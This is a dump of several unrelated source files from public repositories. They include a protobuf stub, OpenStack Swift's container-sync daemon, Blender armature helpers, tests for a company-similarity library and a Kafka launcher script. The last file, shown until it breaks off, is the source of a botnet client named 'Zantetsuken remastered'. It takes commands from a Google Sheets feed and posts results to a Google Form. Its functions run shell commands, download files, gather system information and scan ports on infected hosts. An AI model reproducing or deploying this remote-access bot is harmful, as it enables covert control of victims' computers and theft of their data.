from console_gateway_sdk.model.inspection.arg_pb2 import (
InspectionArg as console_gateway_sdk___model___inspection___arg_pb2___InspectionArg,
)
from google.protobuf.descriptor import (
Descriptor as google___protobuf___descriptor___Descriptor,
)
from google.protobuf.internal.containers import (
RepeatedCompositeFieldContainer as google___protobuf___internal___containers___RepeatedCompositeFieldContainer,
)
from google.protobuf.message import (
Message as google___protobuf___message___Message,
)
from typing import (
Iterable as typing___Iterable,
Optional as typing___Optional,
Text as typing___Text,
Union as typing___Union,
)
from typing_extensions import (
Literal as typing_extensions___Literal,
)
builtin___bool = bool
builtin___bytes = bytes
builtin___float = float
builtin___int = int
if sys.version_info < (3,):
builtin___buffer = buffer
builtin___unicode = unicode
class InspectionCollector(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
id = ... # type: typing___Text
name = ... # type: typing___Text
content = ... # type: typing___Text
script = ... # type: typing___Text
@property
def args(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[console_gateway_sdk___model___inspection___arg_pb2___InspectionArg]: ...
def __init__(self,
*,
id : typing___Optional[typing___Text] = None,
name : typing___Optional[typing___Text] = None,
content : typing___Optional[typing___Text] = None,
script : typing___Optional[typing___Text] = None,
args : typing___Optional[typing___Iterable[console_gateway_sdk___model___inspection___arg_pb2___InspectionArg]] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> InspectionCollector: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> InspectionCollector: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"args",b"args",u"content",b"content",u"id",b"id",u"name",b"name",u"script",b"script"]) -> None: ...
|
[
"service@easyops.cn"
] |
service@easyops.cn
|
bd731b54b3f34a5f9c78bc5a8c9a5b2f0e2e69ba
|
71ff08cd801bbedc0902af096e8c4630f4747f4b
|
/container/sync.py
|
0a3d0209e830b73bc83c496bb14d2a8663d363e5
|
[] |
no_license
|
Prosunjit/Swift
|
9b631b2a90ae10f1b24087a39fb2f322248387c5
|
4bb1319194e0be26bf62c95d004c450be4a05b82
|
refs/heads/master
| 2021-01-10T20:25:35.588770
| 2014-10-25T17:01:37
| 2014-10-25T17:01:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 21,829
|
py
|
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import uuid
from swift import gettext_ as _
from time import ctime, time
from random import choice, random, shuffle
from struct import unpack_from
from eventlet import sleep, Timeout
import swift.common.db
from swift.container.backend import ContainerBroker, DATADIR
from swift.common.container_sync_realms import ContainerSyncRealms
from swift.common.direct_client import direct_get_object
from swift.common.internal_client import delete_object, put_object
from swift.common.exceptions import ClientException
from swift.common.ring import Ring
from swift.common.utils import (
audit_location_generator, clean_content_type, config_true_value,
FileLikeIter, get_logger, hash_path, quote, urlparse, validate_sync_to,
whataremyips)
from swift.common.daemon import Daemon
from swift.common.http import HTTP_UNAUTHORIZED, HTTP_NOT_FOUND
class ContainerSync(Daemon):
"""
Daemon to sync syncable containers.
This is done by scanning the local devices for container databases and
checking for x-container-sync-to and x-container-sync-key metadata values.
If they exist, newer rows since the last sync will trigger PUTs or DELETEs
to the other container.
.. note::
Container sync will sync object POSTs only if the proxy server is set
to use "object_post_as_copy = true" which is the default. So-called
fast object posts, "object_post_as_copy = false" do not update the
container listings and therefore can't be detected for synchronization.
The actual syncing is slightly more complicated to make use of the three
(or number-of-replicas) main nodes for a container without each trying to
do the exact same work but also without missing work if one node happens to
be down.
Two sync points are kept per container database. All rows between the two
sync points trigger updates. Any rows newer than both sync points cause
updates depending on the node's position for the container (primary nodes
do one third, etc. depending on the replica count of course). After a sync
run, the first sync point is set to the newest ROWID known and the second
sync point is set to newest ROWID for which all updates have been sent.
An example may help. Assume replica count is 3 and perfectly matching
ROWIDs starting at 1.
First sync run, database has 6 rows:
* SyncPoint1 starts as -1.
* SyncPoint2 starts as -1.
* No rows between points, so no "all updates" rows.
* Six rows newer than SyncPoint1, so a third of the rows are sent
by node 1, another third by node 2, remaining third by node 3.
* SyncPoint1 is set as 6 (the newest ROWID known).
* SyncPoint2 is left as -1 since no "all updates" rows were synced.
Next sync run, database has 12 rows:
* SyncPoint1 starts as 6.
* SyncPoint2 starts as -1.
* The rows between -1 and 6 all trigger updates (most of which
should short-circuit on the remote end as having already been
done).
* Six more rows newer than SyncPoint1, so a third of the rows are
sent by node 1, another third by node 2, remaining third by node
3.
* SyncPoint1 is set as 12 (the newest ROWID known).
* SyncPoint2 is set as 6 (the newest "all updates" ROWID).
In this way, under normal circumstances each node sends its share of
updates each run and just sends a batch of older updates to ensure nothing
was missed.
:param conf: The dict of configuration values from the [container-sync]
section of the container-server.conf
:param container_ring: If None, the <swift_dir>/container.ring.gz will be
loaded. This is overridden by unit tests.
:param object_ring: If None, the <swift_dir>/object.ring.gz will be loaded.
This is overridden by unit tests.
"""
def __init__(self, conf, container_ring=None, object_ring=None):
#: The dict of configuration values from the [container-sync] section
#: of the container-server.conf.
self.conf = conf
#: Logger to use for container-sync log lines.
self.logger = get_logger(conf, log_route='container-sync')
#: Path to the local device mount points.
self.devices = conf.get('devices', '/srv/node')
#: Indicates whether mount points should be verified as actual mount
#: points (normally true, false for tests and SAIO).
self.mount_check = config_true_value(conf.get('mount_check', 'true'))
#: Minimum time between full scans. This is to keep the daemon from
#: running wild on near empty systems.
self.interval = int(conf.get('interval', 300))
#: Maximum amount of time to spend syncing a container before moving on
#: to the next one. If a conatiner sync hasn't finished in this time,
#: it'll just be resumed next scan.
self.container_time = int(conf.get('container_time', 60))
#: ContainerSyncCluster instance for validating sync-to values.
self.realms_conf = ContainerSyncRealms(
os.path.join(
conf.get('swift_dir', '/etc/swift'),
'container-sync-realms.conf'),
self.logger)
#: The list of hosts we're allowed to send syncs to. This can be
#: overridden by data in self.realms_conf
self.allowed_sync_hosts = [
h.strip()
for h in conf.get('allowed_sync_hosts', '127.0.0.1').split(',')
if h.strip()]
self.http_proxies = [
a.strip()
for a in conf.get('sync_proxy', '').split(',')
if a.strip()]
#: Number of containers with sync turned on that were successfully
#: synced.
self.container_syncs = 0
#: Number of successful DELETEs triggered.
self.container_deletes = 0
#: Number of successful PUTs triggered.
self.container_puts = 0
#: Number of containers that didn't have sync turned on.
self.container_skips = 0
#: Number of containers that had a failure of some type.
self.container_failures = 0
#: Time of last stats report.
self.reported = time()
swift_dir = conf.get('swift_dir', '/etc/swift')
#: swift.common.ring.Ring for locating containers.
self.container_ring = container_ring or Ring(swift_dir,
ring_name='container')
#: swift.common.ring.Ring for locating objects.
self.object_ring = object_ring or Ring(swift_dir, ring_name='object')
self._myips = whataremyips()
self._myport = int(conf.get('bind_port', 6001))
swift.common.db.DB_PREALLOCATION = \
config_true_value(conf.get('db_preallocation', 'f'))
def run_forever(self, *args, **kwargs):
"""
Runs container sync scans until stopped.
"""
sleep(random() * self.interval)
while True:
begin = time()
all_locs = audit_location_generator(self.devices, DATADIR, '.db',
mount_check=self.mount_check,
logger=self.logger)
for path, device, partition in all_locs:
self.container_sync(path)
if time() - self.reported >= 3600: # once an hour
self.report()
elapsed = time() - begin
if elapsed < self.interval:
sleep(self.interval - elapsed)
def run_once(self, *args, **kwargs):
"""
Runs a single container sync scan.
"""
self.logger.info(_('Begin container sync "once" mode'))
begin = time()
all_locs = audit_location_generator(self.devices, DATADIR, '.db',
mount_check=self.mount_check,
logger=self.logger)
for path, device, partition in all_locs:
self.container_sync(path)
if time() - self.reported >= 3600: # once an hour
self.report()
self.report()
elapsed = time() - begin
self.logger.info(
_('Container sync "once" mode completed: %.02fs'), elapsed)
def report(self):
"""
Writes a report of the stats to the logger and resets the stats for the
next report.
"""
self.logger.info(
_('Since %(time)s: %(sync)s synced [%(delete)s deletes, %(put)s '
'puts], %(skip)s skipped, %(fail)s failed'),
{'time': ctime(self.reported),
'sync': self.container_syncs,
'delete': self.container_deletes,
'put': self.container_puts,
'skip': self.container_skips,
'fail': self.container_failures})
self.reported = time()
self.container_syncs = 0
self.container_deletes = 0
self.container_puts = 0
self.container_skips = 0
self.container_failures = 0
def container_sync(self, path):
"""
Checks the given path for a container database, determines if syncing
is turned on for that database and, if so, sends any updates to the
other container.
:param path: the path to a container db
"""
broker = None
try:
broker = ContainerBroker(path)
info = broker.get_info()
x, nodes = self.container_ring.get_nodes(info['account'],
info['container'])
for ordinal, node in enumerate(nodes):
if node['ip'] in self._myips and node['port'] == self._myport:
break
else:
return
if not broker.is_deleted():
sync_to = None
user_key = None
sync_point1 = info['x_container_sync_point1']
sync_point2 = info['x_container_sync_point2']
for key, (value, timestamp) in broker.metadata.iteritems():
if key.lower() == 'x-container-sync-to':
sync_to = value
elif key.lower() == 'x-container-sync-key':
user_key = value
if not sync_to or not user_key:
self.container_skips += 1
self.logger.increment('skips')
return
err, sync_to, realm, realm_key = validate_sync_to(
sync_to, self.allowed_sync_hosts, self.realms_conf)
if err:
self.logger.info(
_('ERROR %(db_file)s: %(validate_sync_to_err)s'),
{'db_file': str(broker),
'validate_sync_to_err': err})
self.container_failures += 1
self.logger.increment('failures')
return
stop_at = time() + self.container_time
next_sync_point = None
while time() < stop_at and sync_point2 < sync_point1:
rows = broker.get_items_since(sync_point2, 1)
if not rows:
break
row = rows[0]
if row['ROWID'] > sync_point1:
break
key = hash_path(info['account'], info['container'],
row['name'], raw_digest=True)
# This node will only initially sync out one third of the
# objects (if 3 replicas, 1/4 if 4, etc.) and will skip
# problematic rows as needed in case of faults.
# This section will attempt to sync previously skipped
# rows in case the previous attempts by any of the nodes
# didn't succeed.
if not self.container_sync_row(
row, sync_to, user_key, broker, info, realm,
realm_key):
if not next_sync_point:
next_sync_point = sync_point2
sync_point2 = row['ROWID']
broker.set_x_container_sync_points(None, sync_point2)
if next_sync_point:
broker.set_x_container_sync_points(None, next_sync_point)
while time() < stop_at:
rows = broker.get_items_since(sync_point1, 1)
if not rows:
break
row = rows[0]
key = hash_path(info['account'], info['container'],
row['name'], raw_digest=True)
# This node will only initially sync out one third of the
# objects (if 3 replicas, 1/4 if 4, etc.). It'll come back
# around to the section above and attempt to sync
# previously skipped rows in case the other nodes didn't
# succeed or in case it failed to do so the first time.
if unpack_from('>I', key)[0] % \
len(nodes) == ordinal:
self.container_sync_row(
row, sync_to, user_key, broker, info, realm,
realm_key)
sync_point1 = row['ROWID']
broker.set_x_container_sync_points(sync_point1, None)
self.container_syncs += 1
self.logger.increment('syncs')
except (Exception, Timeout) as err:
self.container_failures += 1
self.logger.increment('failures')
self.logger.exception(_('ERROR Syncing %s'),
broker if broker else path)
def container_sync_row(self, row, sync_to, user_key, broker, info,
realm, realm_key):
"""
Sends the update the row indicates to the sync_to container.
:param row: The updated row in the local database triggering the sync
update.
:param sync_to: The URL to the remote container.
:param user_key: The X-Container-Sync-Key to use when sending requests
to the other container.
:param broker: The local container database broker.
:param info: The get_info result from the local container database
broker.
:param realm: The realm from self.realms_conf, if there is one.
If None, fallback to using the older allowed_sync_hosts
way of syncing.
:param realm_key: The realm key from self.realms_conf, if there
is one. If None, fallback to using the older
allowed_sync_hosts way of syncing.
:returns: True on success
"""
try:
start_time = time()
if row['deleted']:
try:
headers = {'x-timestamp': row['created_at']}
if realm and realm_key:
nonce = uuid.uuid4().hex
path = urlparse(sync_to).path + '/' + quote(
row['name'])
sig = self.realms_conf.get_sig(
'DELETE', path, headers['x-timestamp'], nonce,
realm_key, user_key)
headers['x-container-sync-auth'] = '%s %s %s' % (
realm, nonce, sig)
else:
headers['x-container-sync-key'] = user_key
delete_object(sync_to, name=row['name'], headers=headers,
proxy=self.select_http_proxy(),
logger=self.logger)
except ClientException as err:
if err.http_status != HTTP_NOT_FOUND:
raise
self.container_deletes += 1
self.logger.increment('deletes')
self.logger.timing_since('deletes.timing', start_time)
else:
part, nodes = self.object_ring.get_nodes(
info['account'], info['container'],
row['name'])
shuffle(nodes)
exc = None
looking_for_timestamp = float(row['created_at'])
timestamp = -1
headers = body = None
for node in nodes:
try:
these_headers, this_body = direct_get_object(
node, part, info['account'], info['container'],
row['name'], resp_chunk_size=65536)
this_timestamp = float(these_headers['x-timestamp'])
if this_timestamp > timestamp:
timestamp = this_timestamp
headers = these_headers
body = this_body
except ClientException as err:
# If any errors are not 404, make sure we report the
# non-404 one. We don't want to mistakenly assume the
# object no longer exists just because one says so and
# the others errored for some other reason.
if not exc or getattr(
exc, 'http_status', HTTP_NOT_FOUND) == \
HTTP_NOT_FOUND:
exc = err
except (Exception, Timeout) as err:
exc = err
if timestamp < looking_for_timestamp:
if exc:
raise exc
raise Exception(
_('Unknown exception trying to GET: %(node)r '
'%(account)r %(container)r %(object)r'),
{'node': node, 'part': part,
'account': info['account'],
'container': info['container'],
'object': row['name']})
for key in ('date', 'last-modified'):
if key in headers:
del headers[key]
if 'etag' in headers:
headers['etag'] = headers['etag'].strip('"')
if 'content-type' in headers:
headers['content-type'] = clean_content_type(
headers['content-type'])
headers['x-timestamp'] = row['created_at']
if realm and realm_key:
nonce = uuid.uuid4().hex
path = urlparse(sync_to).path + '/' + quote(row['name'])
sig = self.realms_conf.get_sig(
'PUT', path, headers['x-timestamp'], nonce, realm_key,
user_key)
headers['x-container-sync-auth'] = '%s %s %s' % (
realm, nonce, sig)
else:
headers['x-container-sync-key'] = user_key
put_object(sync_to, name=row['name'], headers=headers,
contents=FileLikeIter(body),
proxy=self.select_http_proxy(), logger=self.logger)
self.container_puts += 1
self.logger.increment('puts')
self.logger.timing_since('puts.timing', start_time)
except ClientException as err:
if err.http_status == HTTP_UNAUTHORIZED:
self.logger.info(
_('Unauth %(sync_from)r => %(sync_to)r'),
{'sync_from': '%s/%s' %
(quote(info['account']), quote(info['container'])),
'sync_to': sync_to})
elif err.http_status == HTTP_NOT_FOUND:
self.logger.info(
_('Not found %(sync_from)r => %(sync_to)r \
- object %(obj_name)r'),
{'sync_from': '%s/%s' %
(quote(info['account']), quote(info['container'])),
'sync_to': sync_to, 'obj_name': row['name']})
else:
self.logger.exception(
_('ERROR Syncing %(db_file)s %(row)s'),
{'db_file': str(broker), 'row': row})
self.container_failures += 1
self.logger.increment('failures')
return False
except (Exception, Timeout) as err:
self.logger.exception(
_('ERROR Syncing %(db_file)s %(row)s'),
{'db_file': str(broker), 'row': row})
self.container_failures += 1
self.logger.increment('failures')
return False
return True
def select_http_proxy(self):
return choice(self.http_proxies) if self.http_proxies else None
|
[
"prosun.csedu@gmail.com"
] |
prosun.csedu@gmail.com
|
2b22e7941f98947b5b972f54f67d8ed480df2bfa
|
1bfb0e3a59cac249827123e1b8bef5bfd72ed4e8
|
/bindpose_utils.py
|
2c9804b381cfe1ad66c67275c58d52a512af6e4b
|
[] |
no_license
|
jeacom25b/Armature_snippets
|
e12b0a798da6e7a59432e0517bdaa6b964ab924c
|
44c37c40fb430e5a36457a66e5c697331053ded6
|
refs/heads/master
| 2021-01-23T17:35:49.085626
| 2017-09-14T12:44:08
| 2017-09-14T12:44:08
| 102,768,115
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,902
|
py
|
import bpy
from mathutils import Vector
import math
class ResetStretch(bpy.types.Operator):
bl_idname = "armature_snippets.reset_stretch"
bl_label = "Reset stretch"
bl_description = ""
bl_options = {"REGISTER", "UNDO"}
@classmethod
def poll(cls, context):
if context.active_object:
return context.active_object.mode == "POSE"
def execute(self, context):
ob = context.active_object
bones = context.selected_pose_bones
last_active_bone = ob.data.bones.active
for bone in bones:
c_type_list = [c.type for c in bone.constraints]
for index, type in enumerate(c_type_list):
if type == "STRETCH_TO":
constraint = bone.constraints[index]
c = context.copy()
c["constraint"] = constraint
ob.data.bones.active = bone.bone
bpy.ops.constraint.stretchto_reset(c, constraint = constraint.name, owner = "BONE")
ob.data.bones.active = last_active_bone
return {"FINISHED"}
class ResetLimdist(bpy.types.Operator):
bl_idname = "armature_snippets.reset_limitdistance"
bl_label = "Reset limit distance"
bl_description = ""
bl_options = {"REGISTER", "UNDO"}
@classmethod
def poll(cls, context):
if context.active_object:
return context.active_object.mode == "POSE"
def execute(self, context):
ob = context.active_object
bones = context.selected_pose_bones
last_active_bone = ob.data.bones.active
for bone in bones:
c_type_list = [c.type for c in bone.constraints]
for index, type in enumerate(c_type_list):
if type == "LIMIT_DISTANCE":
constraint = bone.constraints[index]
c = context.copy()
c["constraint"] = constraint
ob.data.bones.active = bone.bone
bpy.ops.constraint.limitdistance_reset(c, constraint = constraint.name, owner = "BONE")
ob.data.bones.active = last_active_bone
return {"FINISHED"}
# context is the bpy.context,
# p_bone is the pose bone with the constraint
# ik is the Inverse kinimatics constraint on the p_bone
# angle is the angle to try and score
def ik_test(context, p_bone, ik, angle):
# mute constraint for getting original vectors of the bone
ik.mute = True
# then update the scene
context.scene.frame_set(context.scene.frame_current)
# get some vecotrs
v1 = p_bone.vector.copy()
x1 = p_bone.x_axis.copy()
z1 = p_bone.z_axis.copy()
# unmute the constraint
ik.mute = False
# set the pole_angle for the test
ik.pole_angle = angle
# update the scene again
context.scene.frame_set(context.scene.frame_current)
# get the new vectors
v2 = p_bone.vector.copy()
x2 = p_bone.x_axis.copy()
z2 = p_bone.z_axis.copy()
# lets see the diferences..
v_point = (v1 - v2).magnitude
x_point = (x1 - x2).magnitude
z_point = (z1 - z2).magnitude
# lets get the total score
total = v_point + x_point + z_point
# with better score total sould be smaller,
# but it returns zero at multiple angles
# this only can happen if the scene does't update.
print(angle, total)
return (angle, total)
# a siple leerp functinon
def lerp(x, y, c):
a = x * (1 - c)
b = y * c
return a + b
class FindIkPole(bpy.types.Operator):
bl_idname = "armature_snippets.find_ik_pole_angle"
bl_label = "Find IK pole Angle"
bl_description = ""
bl_options = {"REGISTER", "UNDO"}
@classmethod
def poll(cls, context):
if context.active_object:
return context.active_object.mode == "POSE"
def execute(self, context):
ob = context.active_object
bones = context.selected_pose_bones
last_active_bone = ob.data.bones.active
for bone in bones:
c_type_list = [c.type for c in bone.constraints]
for index, type in enumerate(c_type_list):
if type == "IK":
ik = bone.constraints[index]
if not ik.mute:
n1 = -180
n2 = 180
tests = []
for i in range(11):
c = i / 10
angle = lerp(n1, n2, c)
tests.append(ik_test(context, bone, ik, angle))
print(tests)
ob.data.bones.active = last_active_bone
return {"FINISHED"}
|
[
"noreply@github.com"
] |
jeacom25b.noreply@github.com
|
834025c62b2d1817c220a98e1ff02a019d8fc277
|
a175a13680f28ceef3db31c155984a773d2bad32
|
/companysim/tests.py
|
81f332e116e48d1ae093b4472a2b902e76396bf0
|
[] |
no_license
|
meeranmismail/CS341-Startup-Similarity
|
e2d1a405ec69389bcfe7a3ecb4c320183e6ef4f4
|
0552fe6ce5e825711d710c5d3a731c081ae9cfe5
|
refs/heads/master
| 2021-01-19T09:18:46.527076
| 2018-07-02T21:11:41
| 2018-07-02T21:11:41
| 87,747,270
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,724
|
py
|
import unittest
import numpy as np
import pandas as pd
from companysim import CompanyCorpus, CompanyGraph
class TestCompanyCorpus(unittest.TestCase):
# ======== Start of tests for CompanyCorpus class
# Test that the _build_corpus function correctly assigns internal corpus correctly
def test_build_corpus_from_ndarray(self):
test_corpus = [['company_1', 'Provider of software'], ['company_2', 'Provider of hardware']]
test_input = pd.DataFrame(test_corpus, columns=['domain', 'description'])
cc = CompanyCorpus(test_input)
self.assertTrue(isinstance(cc.corpus, pd.DataFrame))
# Test that _build_corpus correctly checks for the right type
def test_build_corpus_type_error(self):
test_corpus = [['company_1', 'Provider of software'], ['company_2', 'Provider of hardware']]
self.assertRaises(TypeError, CompanyCorpus, test_corpus)
# Test the option to provide a pre built idf vector at object creation
def test_idf_vector_pre_built(self):
test_corpus = [['company_1', 'Provider of software'], ['company_2', 'Provider of hardware']]
test_input = pd.DataFrame(test_corpus, columns=['domain', 'description'])
test_idf = [np.log((1 + 1) / (1 + 1)), np.log((1 + 2) / (1 + 1)), np.log((1 + 2) / (1 + 1))]
test_terms = ['provider', 'software', 'hardware']
test_input_idf = pd.Series(test_idf, index=test_terms)
cc = CompanyCorpus(test_input, idf=test_input_idf)
self.assertIsInstance(cc.idf_vector, pd.Series)
# Test that the build_idf function correctly calculates the idf correctly and sets it to the internal value
def test_idf_vector_creation(self):
test_corpus = [['company_1', 'Provider of software'], ['company_2', 'Provider of hardware']]
test_input = pd.DataFrame(test_corpus, columns=['domain', 'description'])
desired_output = [np.log((1 + 1) / (1 + 1)), np.log((1 + 2) / (1 + 1)), np.log((1 + 2) / (1 + 1))]
cc = CompanyCorpus(test_input)
idf_vec, term_vector = cc.build_idf(description_column_name='description')
self.assertTrue(all(val in idf_vec for val in desired_output))
def test_filter_description_by_idf(self):
test_corpus = [['company_1', 'Provider of software'], ['company_2', 'Provider of hardware']]
test_input = pd.DataFrame(test_corpus, columns=['domain', 'description'])
cc = CompanyCorpus(test_input)
number_to_remove = 2
cc.build_idf(description_column_name='description')
cc.filter_desc_by_idf(description_column_name='description',
number_words_to_cut=number_to_remove)
desired_output = [{'software'}, {'hardware'}]
self.assertTrue(all(word in cc.corpus['rare_words'].values for word in desired_output))
# ======== Start of tests for CompanyGraph class
def test_build_lsh_forest(self):
# Create a CompanyCorpus instance, and initialize it with some data
test_corpus = [['company_1', 'Provider of software'], ['company_2', 'Provider of hardware']]
test_input = pd.DataFrame(test_corpus, columns=['domain', 'description'])
cc = CompanyCorpus(test_input)
number_to_remove = 1
cc.build_idf(description_column_name='description')
cc.filter_desc_by_idf(description_column_name='description',
number_words_to_cut=number_to_remove)
# Create a CompanyGraph instance and test building the LSH forest
cg = CompanyGraph(cc)
cg.build_lsh_forest(company_name_column_name='domain')
self.assertTrue(cg.lsh_forest)
def test_build_graph(self):
# Create a CompanyCorpus instance, and initialize it with some data
test_corpus = [['company_1', 'Provider of software'], ['company_2', 'Provider of hardware'],
['company_3', 'Provider of Software technology']]
test_input = pd.DataFrame(test_corpus, columns=['domain', 'description'])
cc = CompanyCorpus(test_input)
number_to_remove = 1
cc.build_idf(description_column_name='description')
cc.filter_desc_by_idf(description_column_name='description',
number_words_to_cut=number_to_remove)
# Create a CompanyGraph instance
cg = CompanyGraph(cc)
cg.build_lsh_forest(company_name_column_name='domain')
cg.build_graph(sensitivity=3)
self.assertIsNotNone(cg.graph)
def test_get_dot_product_score(self):
# Create a CompanyCorpus instance, and initialize it with some data
test_corpus = [['company_1', 'Provider of software'], ['company_2', 'Provider of hardware technology'],
['company_3', 'Provider of Software technology'], ['company_4', 'Provider of software service']]
test_input = pd.DataFrame(test_corpus, columns=['domain', 'description'])
cc = CompanyCorpus(test_input)
number_to_remove = 1
cc.build_idf(description_column_name='description')
cc.filter_desc_by_idf(description_column_name='description',
number_words_to_cut=number_to_remove)
# Create a CompanyGraph instance
cg = CompanyGraph(cc)
cg.build_lsh_forest(company_name_column_name='domain')
cg.build_graph(sensitivity=4)
# Run test of function
print(cg.graph.todense())
dot_product_score = cg.get_dot_product_score('company_1', 'company_3')
print(dot_product_score)
self.assertNotEqual(0., dot_product_score)
def test_get_jaccard_similarity(self):
# Create a CompanyCorpus instance, and initialize it with some data
test_corpus = [['company_1', 'Provider of software'], ['company_2', 'Provider of hardware technology'],
['company_3', 'Provider of Software technology'], ['company_4', 'Provider of software service']]
test_input = pd.DataFrame(test_corpus, columns=['domain', 'description'])
cc = CompanyCorpus(test_input)
number_to_remove = 1
cc.build_idf(description_column_name='description')
cc.filter_desc_by_idf(description_column_name='description',
number_words_to_cut=number_to_remove)
# Create a CompanyGraph instance
cg = CompanyGraph(cc)
cg.build_lsh_forest(company_name_column_name='domain')
cg.build_graph(sensitivity=3)
# print(cg.graph.todense())
# Run test of function
jaccard_similarity = cg.get_jaccard_similarity('company_1', 'company_3')
self.assertNotEqual(0., jaccard_similarity)
if __name__ == '__main__':
unittest.main()
|
[
"noreply@github.com"
] |
meeranmismail.noreply@github.com
|
bb70917bf01dbab86fba90d144a6ab13ff8fee5e
|
c54fff2c9a8bc3548824f99a1667d4ada2652cc6
|
/kafka_server.py
|
2b767c031ef5d1d6ebf62bc588138eb0fe2722b2
|
[] |
no_license
|
tfenton/udacity-sf-crime-stats
|
20d0228b9ba9fadc85e86c02cff7934d1632d950
|
ebf661cff30e202344df16584c681ea3e8d967b6
|
refs/heads/master
| 2022-11-29T18:27:54.568875
| 2020-07-29T20:52:27
| 2020-07-29T20:52:27
| 283,592,485
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 683
|
py
|
import producer_server
def run_kafka_server():
"""
creates the kafka producer object
params - None
returns - kafka producer
"""
# TODO get the json file path
input_file = "police-department-calls-for-service.json"
# TODO fill in blanks
producer = producer_server.ProducerServer(
input_file=input_file,
topic="calls",
bootstrap_servers="localhost:9092",
client_id=None
)
return producer
def feed():
"""
starts consuming from the kafka producer
params - None
returns - None
"""
producer = run_kafka_server()
producer.generate_data()
if __name__ == "__main__":
feed()
|
[
"tfenton@gmail.com"
] |
tfenton@gmail.com
|
4480c797b15a575e7d8ac1d0d15828b55ab7d84e
|
e5939977c8d04b8c805520c90b3b3799f17a688c
|
/prototype.py
|
afd313c04cd8731c5b075f5c5a339ce5d692e6e2
|
[
"MIT"
] |
permissive
|
zard777/xbot_remastered
|
186b815f2a975a0ecb2c5f3523ff2e900eadbbdc
|
0e837923c0d8e07c9d90ee511b5220b170bc34ae
|
refs/heads/master
| 2021-09-11T00:53:51.210173
| 2018-04-05T04:54:38
| 2018-04-05T04:54:38
| 76,875,702
| 0
| 1
| null | 2018-02-10T09:30:15
| 2016-12-19T15:55:40
|
Python
|
UTF-8
|
Python
| false
| false
| 9,580
|
py
|
'''
=============
Zantetsuken remastered
============
'''
import __main__,urllib,urllib2,httplib,base64,threading,random,platform,os,subprocess
from socket import *
from HTMLParser import HTMLParser
cmdrcv=''
feed="https://spreadsheets.google.com/feeds/list/[REPLACE_WITH_YOUR_OWN]/1/public/basic?alt=rss"
actionurl="https://docs.google.com/forms/d/e/[REPLACE_WITH_YOUR_OWN]/formResponse"
cmdz='entry. '
resp='entry. '
connected='entry. '
#Command Extraction
class MyParser(HTMLParser):
commands = ""
is_present = ""
def handle_starttag(self, tag,attrs):
if tag == 'description':
self.is_present = 1
def handle_data(self, data):
global cmdrcv
if self.is_present:
if "command:" in data:
self.commands = data
cmdrcv=self.commands.replace("command: ","")
self.is_title = 0
#Thread for checking new commmands.
class check_commands(threading.Thread):
def __init__(self,botid):
threading.Thread.__init__(self)
self.event = threading.Event()
self.botid=botid
def run(self):
global cmdrcv,connected,actionurl,cmdz,resp,feed
try:
while not self.event.is_set():
file=urllib2.urlopen(feed)
xml=file.read()
file.close()
parser = MyParser()
parser.feed(xml)
#print cmdrcv
#self.id -->botid
if botid in cmdrcv or "xBOTALL" in cmdrcv:
#print cmdrcv
if botid in cmdrcv:
cmdrcv=cmdrcv.replace(botid+' ','')
elif "xBOTALL" in cmdrcv:
cmdrcv=cmdrcv.replace("xBOTALL ","")
if cmdrcv=="xSYSINFO":
sys_info(cmdz,resp,botid)
elif "xDOWNLOAD" in cmdrcv:
url=cmdrcv.replace("xDOWNLOAD ","")
download(url,cmdz,resp,botid)
elif "xUPLOAD" in cmdrcv:
filepath=cmdrcv.replace("xUPLOAD ","")
upload(filepath,cmdz,resp,botid)
elif "xEXECUTE" in cmdrcv:
cmd=cmdrcv.replace("xEXECUTE ","")
execute(cmd,cmdz,resp,botid)
elif "xPORTSCAN" in cmdrcv:
host=cmdrcv.replace("xPORTSCAN ","")
portscan(host,cmdz,resp,botid)
elif cmdrcv=="xSCREENSHOT":
screenshot(cmdz,resp,botid)
elif cmdrcv=="xNETWORK":
network(cmdz,resp,botid)
elif cmdrcv=="xKILL":
selfkill(cmdz,resp,botid,actionurl,connected)
elif cmdrcv=="xDONE":
pass
else:
pass
except:
pass
self.event.wait(timeout=5)
#send back responses to C&C.
def output(op_data,field):
global actionurl
response={field:op_data}
try:
dataenc=urllib.urlencode(response)
req=urllib2.Request(actionurl,dataenc)
urllib2.urlopen(req)
except:
pass
#system information module
def sys_info(cmdz,resp,botid):
try:
op=''
if platform.system()=="Windows":
for i in os.popen("systeminfo"):
op=op+str(i)
elif platform.system()=="Linux":
for i in os.popen("cat /proc/version"):
op=op+str(i)
for i in os.popen("whoami"):
op=op+"User: " +str(i)
for i in os.popen("cat /proc/cpuinfo"):
op=op+str(i)
elif platform.system()=="Darwin":
for i in os.popen("sw_vers"):
op=op+str(i)
for i in os.popen("system_profiler -detailLevel basic"):
op=op+str(i)
output(botid+': '+op,resp)
output(botid+" xDONE",cmdz)
except Exception as e:
output(botid+': '+str(e),resp)
#download module
def download(url,cmdz,resp,botid):
try:
filename=url.split('/')
filename=filename.pop()
f=urllib2.urlopen(url)
data=f.read()
f.close()
final=open(filename, "wb")
final.write(data)
final.close()
output(botid+': '+filename + " downloaded sucessfully",resp)
output(botid+" xDONE",cmdz)
except Exception as e:
output(botid+": Download failed with exception: "+str(e),resp)
#execute system commands
def execute(exe,cmdz,resp,botid):
try:
op=''
for i in os.popen(exe):
op=op+str(i)
output(botid+": "+op,resp)
output(botid+" xDONE",cmdz)
except Exception as e:
